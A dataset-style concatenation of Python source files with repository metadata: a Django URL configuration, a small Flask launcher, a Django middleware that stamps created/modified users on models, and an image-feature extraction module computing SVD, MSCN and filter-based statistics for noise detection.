8131fac833cf4edd20ac3497377ec2145fa75bcc
|
[
"MIT"
] | null | null | null |
config/urls.py
|
erik-sn/tagmap
|
8131fac833cf4edd20ac3497377ec2145fa75bcc
|
[
"MIT"
] | null | null | null |
config/urls.py
|
erik-sn/tagmap
|
8131fac833cf4edd20ac3497377ec2145fa75bcc
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.conf.urls import url, include
from django.contrib import admin
from api.views import index
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('api.urls')),
]
# troubleshooting tool
if settings.TOOLBAR:
import debug_toolbar
urlpatterns = [
url(r'^__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
"""
If we are serving the base html file through django then
route all non-matching urls to the html file where they
will be processed on the client by the react application
"""
if settings.SERVER_TYPE.upper() == 'DJANGO':
urlpatterns += [url(r'^.*$', index)]
| 25.653846
| 57
| 0.706147
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 256
| 0.383808
|
a26076e09d7b45380034f14f9bab4f75147d9786
| 86
|
py
|
Python
|
run.py
|
tdavislab/mapper-stitching
|
09cb6949cea57ebece640b58ef5c449fb177db38
|
[
"MIT"
] | 10
|
2019-06-12T01:18:44.000Z
|
2021-12-19T16:12:08.000Z
|
run.py
|
tdavislab/mapper-stitching
|
09cb6949cea57ebece640b58ef5c449fb177db38
|
[
"MIT"
] | 7
|
2019-03-20T23:47:49.000Z
|
2019-04-10T19:23:41.000Z
|
run.py
|
tdavislab/mapper-stitching
|
09cb6949cea57ebece640b58ef5c449fb177db38
|
[
"MIT"
] | 3
|
2020-10-16T04:30:09.000Z
|
2021-03-16T18:45:33.000Z
|
#!flask/bin/python
from app import app
app.run(host='127.0.0.1',port=8080,debug=True)
| 21.5
| 46
| 0.732558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 29
| 0.337209
|
a26126e8b013a4ee9583aa03f98292063e236062
| 2,572
|
py
|
Python
|
middleware.py
|
jaylett/django_audited_model
|
b7d45b2e325512861a0ef23e756a81bfdf3adaf7
|
[
"MIT"
] | 1
|
2016-05-06T07:07:18.000Z
|
2016-05-06T07:07:18.000Z
|
middleware.py
|
jaylett/django_audited_model
|
b7d45b2e325512861a0ef23e756a81bfdf3adaf7
|
[
"MIT"
] | null | null | null |
middleware.py
|
jaylett/django_audited_model
|
b7d45b2e325512861a0ef23e756a81bfdf3adaf7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2009 James Aylett <http://tartarus.org/james/computers/django/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from django.db.models.signals import pre_save
import threading
import datetime
stash = threading.local()
def get_current_user():
"""Get the user whose session resulted in the current code running. (Only valid during requests.)"""
return getattr(stash, 'current_user', None)
def set_current_user(user):
stash.current_user = user
def onanymodel_presave(sender, **kwargs):
current_user = get_current_user()
if current_user is None or not current_user.is_authenticated():
# if there is no current user or we're an unauthenticated user (ie: guest)
# then don't do anything. The save() will fail if created_by or modified_by
# are null=False, and not otherwise; ie the behaviour is controlled by the
# models, as desired.
current_user = None
obj = kwargs['instance']
if hasattr(obj, 'modified_at'):
obj.modified_at = datetime.datetime.now()
if hasattr(obj, 'modified_by_id'):
if current_user and current_user.is_authenticated():
obj.modified_by = current_user
if not obj.pk:
if hasattr(obj, 'created_at'):
obj.created_at = datetime.datetime.now()
if hasattr(obj, 'created_by_id') and not obj.created_by:
obj.created_by = current_user
pre_save.connect(onanymodel_presave)
class AutoCreatedAndModifiedFields:
def process_request(self, request):
set_current_user(request.user)
| 42.866667
| 104
| 0.734059
| 114
| 0.044323
| 0
| 0
| 0
| 0
| 0
| 0
| 1,545
| 0.6007
|
a261c4073b37f990b45a6d0c9e5cc17d54ee8a8f
| 24,440
|
py
|
Python
|
data_attributes.py
|
prise-3d/Thesis-NoiseDetection-metrics
|
b37b2a3e0601e8a879df12c9d88289b1ea43bbb1
|
[
"MIT"
] | null | null | null |
data_attributes.py
|
prise-3d/Thesis-NoiseDetection-metrics
|
b37b2a3e0601e8a879df12c9d88289b1ea43bbb1
|
[
"MIT"
] | null | null | null |
data_attributes.py
|
prise-3d/Thesis-NoiseDetection-metrics
|
b37b2a3e0601e8a879df12c9d88289b1ea43bbb1
|
[
"MIT"
] | null | null | null |
# main imports
import numpy as np
import sys
# image transform imports
from PIL import Image
from skimage import color
from sklearn.decomposition import FastICA
from sklearn.decomposition import IncrementalPCA
from sklearn.decomposition import TruncatedSVD
from numpy.linalg import svd as lin_svd
from scipy.signal import medfilt2d, wiener, cwt
import pywt
import cv2
from ipfml.processing import transform, compression, segmentation
from ipfml.filters import convolution, kernels
from ipfml import utils
# modules and config imports
sys.path.insert(0, '') # trick to enable import of main folder module
import custom_config as cfg
from modules.utils import data as dt
def get_image_features(data_type, block):
"""
Method which returns the data type expected
"""
if data_type == 'lab':
block_file_path = '/tmp/lab_img.png'
block.save(block_file_path)
data = transform.get_LAB_L_SVD_s(Image.open(block_file_path))
if data_type == 'mscn':
img_mscn_revisited = transform.rgb_to_mscn(block)
# save tmp as img
img_output = Image.fromarray(img_mscn_revisited.astype('uint8'), 'L')
mscn_revisited_file_path = '/tmp/mscn_revisited_img.png'
img_output.save(mscn_revisited_file_path)
img_block = Image.open(mscn_revisited_file_path)
# extract from temp image
data = compression.get_SVD_s(img_block)
"""if data_type == 'mscn':
img_gray = np.array(color.rgb2gray(np.asarray(block))*255, 'uint8')
img_mscn = transform.calculate_mscn_coefficients(img_gray, 7)
img_mscn_norm = transform.normalize_2D_arr(img_mscn)
img_mscn_gray = np.array(img_mscn_norm*255, 'uint8')
data = compression.get_SVD_s(img_mscn_gray)
"""
if data_type == 'low_bits_6':
low_bits_6 = transform.rgb_to_LAB_L_low_bits(block, 6)
data = compression.get_SVD_s(low_bits_6)
if data_type == 'low_bits_5':
low_bits_5 = transform.rgb_to_LAB_L_low_bits(block, 5)
data = compression.get_SVD_s(low_bits_5)
if data_type == 'low_bits_4':
low_bits_4 = transform.rgb_to_LAB_L_low_bits(block, 4)
data = compression.get_SVD_s(low_bits_4)
if data_type == 'low_bits_3':
low_bits_3 = transform.rgb_to_LAB_L_low_bits(block, 3)
data = compression.get_SVD_s(low_bits_3)
if data_type == 'low_bits_2':
low_bits_2 = transform.rgb_to_LAB_L_low_bits(block, 2)
data = compression.get_SVD_s(low_bits_2)
if data_type == 'low_bits_4_shifted_2':
data = compression.get_SVD_s(transform.rgb_to_LAB_L_bits(block, (3, 6)))
if data_type == 'sub_blocks_stats':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 4), int(height / 4)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
# get information we want from svd
data.append(np.mean(l_svd_data))
data.append(np.median(l_svd_data))
data.append(np.percentile(l_svd_data, 25))
data.append(np.percentile(l_svd_data, 75))
data.append(np.var(l_svd_data))
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=100)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_stats_reduced':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 4), int(height / 4)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
# get information we want from svd
data.append(np.mean(l_svd_data))
data.append(np.median(l_svd_data))
data.append(np.percentile(l_svd_data, 25))
data.append(np.percentile(l_svd_data, 75))
data.append(np.var(l_svd_data))
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_area':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 8), int(height / 8)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=50)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'sub_blocks_area_normed':
block = np.asarray(block)
width, height, _= block.shape
sub_width, sub_height = int(width / 8), int(height / 8)
sub_blocks = segmentation.divide_in_blocks(block, (sub_width, sub_height))
data = []
for sub_b in sub_blocks:
# by default use the whole lab L canal
l_svd_data = np.array(transform.get_LAB_L_SVD_s(sub_b))
l_svd_data = utils.normalize_arr(l_svd_data)
area_under_curve = utils.integral_area_trapz(l_svd_data, dx=50)
data.append(area_under_curve)
# convert into numpy array after computing all stats
data = np.asarray(data)
if data_type == 'mscn_var_4':
data = _get_mscn_variance(block, (100, 100))
if data_type == 'mscn_var_16':
data = _get_mscn_variance(block, (50, 50))
if data_type == 'mscn_var_64':
data = _get_mscn_variance(block, (25, 25))
if data_type == 'mscn_var_16_max':
data = _get_mscn_variance(block, (50, 50))
data = np.asarray(data)
size = int(len(data) / 4)
indices = data.argsort()[-size:][::-1]
data = data[indices]
if data_type == 'mscn_var_64_max':
data = _get_mscn_variance(block, (25, 25))
data = np.asarray(data)
size = int(len(data) / 4)
indices = data.argsort()[-size:][::-1]
data = data[indices]
if data_type == 'ica_diff':
current_image = transform.get_LAB_L(block)
ica = FastICA(n_components=50)
ica.fit(current_image)
image_ica = ica.fit_transform(current_image)
image_restored = ica.inverse_transform(image_ica)
final_image = utils.normalize_2D_arr(image_restored)
final_image = np.array(final_image * 255, 'uint8')
sv_values = utils.normalize_arr(compression.get_SVD_s(current_image))
ica_sv_values = utils.normalize_arr(compression.get_SVD_s(final_image))
data = abs(np.array(sv_values) - np.array(ica_sv_values))
if data_type == 'svd_trunc_diff':
current_image = transform.get_LAB_L(block)
svd = TruncatedSVD(n_components=30, n_iter=100, random_state=42)
transformed_image = svd.fit_transform(current_image)
restored_image = svd.inverse_transform(transformed_image)
reduced_image = (current_image - restored_image)
U, s, V = compression.get_SVD(reduced_image)
data = s
if data_type == 'ipca_diff':
current_image = transform.get_LAB_L(block)
transformer = IncrementalPCA(n_components=20, batch_size=25)
transformed_image = transformer.fit_transform(current_image)
restored_image = transformer.inverse_transform(transformed_image)
reduced_image = (current_image - restored_image)
U, s, V = compression.get_SVD(reduced_image)
data = s
if data_type == 'svd_reconstruct':
reconstructed_interval = (90, 200)
begin, end = reconstructed_interval
lab_img = transform.get_LAB_L(block)
lab_img = np.array(lab_img, 'uint8')
U, s, V = lin_svd(lab_img, full_matrices=True)
smat = np.zeros((end-begin, end-begin), dtype=complex)
smat[:, :] = np.diag(s[begin:end])
output_img = np.dot(U[:, begin:end], np.dot(smat, V[begin:end, :]))
output_img = np.array(output_img, 'uint8')
data = compression.get_SVD_s(output_img)
if 'sv_std_filters' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
# with the use of wavelet
if 'wave_sv_std_filters' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
images.append(medfilt2d(arr, [3, 3]))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
# with the use of wavelet
if 'sv_std_filters_full' in data_type:
# convert into lab by default to apply filters
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
# Apply list of filter on arr
kernel = np.ones((3,3),np.float32)/9
images.append(cv2.filter2D(arr,-1,kernel))
kernel = np.ones((5,5),np.float32)/25
images.append(cv2.filter2D(arr,-1,kernel))
images.append(cv2.GaussianBlur(arr, (3, 3), 0.5))
images.append(cv2.GaussianBlur(arr, (3, 3), 1))
images.append(cv2.GaussianBlur(arr, (3, 3), 1.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 0.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 1))
images.append(cv2.GaussianBlur(arr, (5, 5), 1.5))
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
wave = w2d(arr, 'db1', 2)
images.append(np.array(wave, 'float64'))
# By default computation of current block image
s_arr = compression.get_SVD_s(arr)
sv_vector = [s_arr]
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_array = np.array(sv_vector)
_, length = sv_array.shape
sv_std = []
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
data = s_arr[indices]
if 'sv_entropy_std_filters' in data_type:
lab_img = transform.get_LAB_L(block)
arr = np.array(lab_img)
images = []
kernel = np.ones((3,3),np.float32)/9
images.append(cv2.filter2D(arr,-1,kernel))
kernel = np.ones((5,5),np.float32)/25
images.append(cv2.filter2D(arr,-1,kernel))
images.append(cv2.GaussianBlur(arr, (3, 3), 0.5))
images.append(cv2.GaussianBlur(arr, (3, 3), 1))
images.append(cv2.GaussianBlur(arr, (3, 3), 1.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 0.5))
images.append(cv2.GaussianBlur(arr, (5, 5), 1))
images.append(cv2.GaussianBlur(arr, (5, 5), 1.5))
images.append(medfilt2d(arr, [3, 3]))
images.append(medfilt2d(arr, [5, 5]))
images.append(wiener(arr, [3, 3]))
images.append(wiener(arr, [5, 5]))
wave = w2d(arr, 'db1', 2)
images.append(np.array(wave, 'float64'))
sv_vector = []
sv_entropy_list = []
# for each new image apply SVD and get SV
for img in images:
s = compression.get_SVD_s(img)
sv_vector.append(s)
sv_entropy = [utils.get_entropy_contribution_of_i(s, id_sv) for id_sv, sv in enumerate(s)]
sv_entropy_list.append(sv_entropy)
sv_std = []
sv_array = np.array(sv_vector)
_, length = sv_array.shape
# normalize each SV vectors and compute standard deviation for each sub vectors
for i in range(length):
sv_array[:, i] = utils.normalize_arr(sv_array[:, i])
sv_std.append(np.std(sv_array[:, i]))
indices = []
if 'lowest' in data_type:
indices = utils.get_indices_of_lowest_values(sv_std, 200)
if 'highest' in data_type:
indices = utils.get_indices_of_highest_values(sv_std, 200)
# data are arranged following std trend computed
s_arr = compression.get_SVD_s(arr)
data = s_arr[indices]
if 'convolutional_kernels' in data_type:
sub_zones = segmentation.divide_in_blocks(block, (20, 20))
data = []
diff_std_list_3 = []
diff_std_list_5 = []
diff_mean_list_3 = []
diff_mean_list_5 = []
plane_std_list_3 = []
plane_std_list_5 = []
plane_mean_list_3 = []
plane_mean_list_5 = []
plane_max_std_list_3 = []
plane_max_std_list_5 = []
plane_max_mean_list_3 = []
plane_max_mean_list_5 = []
for sub_zone in sub_zones:
l_img = transform.get_LAB_L(sub_zone)
normed_l_img = utils.normalize_2D_arr(l_img)
# bilateral with window of size (3, 3)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (3, 3))
std_diff = np.std(normed_diff)
mean_diff = np.mean(normed_diff)
diff_std_list_3.append(std_diff)
diff_mean_list_3.append(mean_diff)
# bilateral with window of size (5, 5)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (5, 5))
std_diff = np.std(normed_diff)
mean_diff = np.mean(normed_diff)
diff_std_list_5.append(std_diff)
diff_mean_list_5.append(mean_diff)
# plane mean with window of size (3, 3)
normed_plane_mean = convolution.convolution2D(normed_l_img, kernels.plane_mean, (3, 3))
std_plane_mean = np.std(normed_plane_mean)
mean_plane_mean = np.mean(normed_plane_mean)
plane_std_list_3.append(std_plane_mean)
plane_mean_list_3.append(mean_plane_mean)
# plane mean with window of size (5, 5)
normed_plane_mean = convolution.convolution2D(normed_l_img, kernels.plane_mean, (5, 5))
std_plane_mean = np.std(normed_plane_mean)
mean_plane_mean = np.mean(normed_plane_mean)
plane_std_list_5.append(std_plane_mean)
plane_mean_list_5.append(mean_plane_mean)
# plane max error with window of size (3, 3)
normed_plane_max = convolution.convolution2D(normed_l_img, kernels.plane_max_error, (3, 3))
std_plane_max = np.std(normed_plane_max)
mean_plane_max = np.mean(normed_plane_max)
plane_max_std_list_3.append(std_plane_max)
plane_max_mean_list_3.append(mean_plane_max)
# plane max error with window of size (5, 5)
normed_plane_max = convolution.convolution2D(normed_l_img, kernels.plane_max_error, (5, 5))
std_plane_max = np.std(normed_plane_max)
mean_plane_max = np.mean(normed_plane_max)
plane_max_std_list_5.append(std_plane_max)
plane_max_mean_list_5.append(mean_plane_max)
diff_std_list_3 = np.array(diff_std_list_3)
diff_std_list_5 = np.array(diff_std_list_5)
diff_mean_list_3 = np.array(diff_mean_list_3)
diff_mean_list_5 = np.array(diff_mean_list_5)
plane_std_list_3 = np.array(plane_std_list_3)
plane_std_list_5 = np.array(plane_std_list_5)
plane_mean_list_3 = np.array(plane_mean_list_3)
plane_mean_list_5 = np.array(plane_mean_list_5)
plane_max_std_list_3 = np.array(plane_max_std_list_3)
plane_max_std_list_5 = np.array(plane_max_std_list_5)
plane_max_mean_list_3 = np.array(plane_max_mean_list_3)
plane_max_mean_list_5 = np.array(plane_max_mean_list_5)
if 'std_max_blocks' in data_type:
data.append(np.std(diff_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(diff_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.std(plane_max_mean_list_5[0:int(len(sub_zones)/5)]))
if 'mean_max_blocks' in data_type:
data.append(np.mean(diff_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(diff_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_mean_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_std_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_mean_list_3[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_std_list_5[0:int(len(sub_zones)/5)]))
data.append(np.mean(plane_max_mean_list_5[0:int(len(sub_zones)/5)]))
if 'std_normed' in data_type:
data.append(np.std(diff_std_list_3))
data.append(np.std(diff_mean_list_3))
data.append(np.std(diff_std_list_5))
data.append(np.std(diff_mean_list_5))
data.append(np.std(plane_std_list_3))
data.append(np.std(plane_mean_list_3))
data.append(np.std(plane_std_list_5))
data.append(np.std(plane_mean_list_5))
data.append(np.std(plane_max_std_list_3))
data.append(np.std(plane_max_mean_list_3))
data.append(np.std(plane_max_std_list_5))
data.append(np.std(plane_max_mean_list_5))
if 'mean_normed' in data_type:
data.append(np.mean(diff_std_list_3))
data.append(np.mean(diff_mean_list_3))
data.append(np.mean(diff_std_list_5))
data.append(np.mean(diff_mean_list_5))
data.append(np.mean(plane_std_list_3))
data.append(np.mean(plane_mean_list_3))
data.append(np.mean(plane_std_list_5))
data.append(np.mean(plane_mean_list_5))
data.append(np.mean(plane_max_std_list_3))
data.append(np.mean(plane_max_mean_list_3))
data.append(np.mean(plane_max_std_list_5))
data.append(np.mean(plane_max_mean_list_5))
data = np.array(data)
if data_type == 'convolutional_kernel_stats_svd':
l_img = transform.get_LAB_L(block)
normed_l_img = utils.normalize_2D_arr(l_img)
# bilateral with window of size (5, 5)
normed_diff = convolution.convolution2D(normed_l_img, kernels.min_bilateral_diff, (5, 5))
# getting sigma vector from SVD compression
s = compression.get_SVD_s(normed_diff)
data = s
if data_type == 'svd_entropy':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
values.append(utils.get_entropy(sv))
data = np.array(values)
if data_type == 'svd_entropy_20':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
values.append(utils.get_entropy(sv))
data = np.array(values)
if data_type == 'svd_entropy_noise_20':
l_img = transform.get_LAB_L(block)
blocks = segmentation.divide_in_blocks(l_img, (20, 20))
values = []
for b in blocks:
sv = compression.get_SVD_s(b)
sv_size = len(sv)
values.append(utils.get_entropy(sv[int(sv_size / 4):]))
data = np.array(values)
return data
def w2d(arr, mode='haar', level=1):
#convert to float
imArray = arr
np.divide(imArray, 255)
# compute coefficients
coeffs=pywt.wavedec2(imArray, mode, level=level)
#Process Coefficients
coeffs_H=list(coeffs)
coeffs_H[0] *= 0
# reconstruction
imArray_H = pywt.waverec2(coeffs_H, mode)
imArray_H *= 255
imArray_H = np.uint8(imArray_H)
return imArray_H
def _get_mscn_variance(block, sub_block_size=(50, 50)):
blocks = segmentation.divide_in_blocks(block, sub_block_size)
data = []
for block in blocks:
mscn_coefficients = transform.get_mscn_coefficients(block)
flat_coeff = mscn_coefficients.flatten()
data.append(np.var(flat_coeff))
return np.sort(data)
| 32.849462
| 103
| 0.627169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,226
| 0.131997
|